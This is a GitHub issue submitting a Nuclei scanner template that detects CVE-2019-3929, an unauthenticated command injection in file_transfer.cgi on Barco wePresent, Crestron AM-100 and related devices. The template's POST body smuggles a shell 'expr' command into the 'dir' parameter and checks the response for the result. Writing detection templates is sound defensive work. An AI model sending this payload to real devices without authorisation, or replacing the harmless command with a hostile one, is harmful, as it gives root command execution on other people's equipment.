### ISSUE TITLE
[nuclei-template] CVE-2019-3929

### ISSUE THREAD

**Issue by FanqXu** [projectdiscovery/nuclei-templates#3082]
### Template Information:

reference:
  - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
  - https://www.exploit-db.com/exploits/46786/
  - https://nvd.nist.gov/vuln/detail/CVE-2019-3929

### Nuclei Template:

```yaml
id: CVE-2019-3929

info:
  name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
  author: _0xf4n9x_
  severity: high
  description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
  reference:
    - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
    - https://www.exploit-db.com/exploits/46786/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3929
  tags: rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/file_transfer.cgi"

    body: "file_transfer=new&dir=%27Pa_Noteexpr%2012392641231223%20%2d%20418712831Pa_Note%27"
    headers:
      Content-Type: application/x-www-form-urlencoded

    redirects: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "12392222518392"
        part: body

```
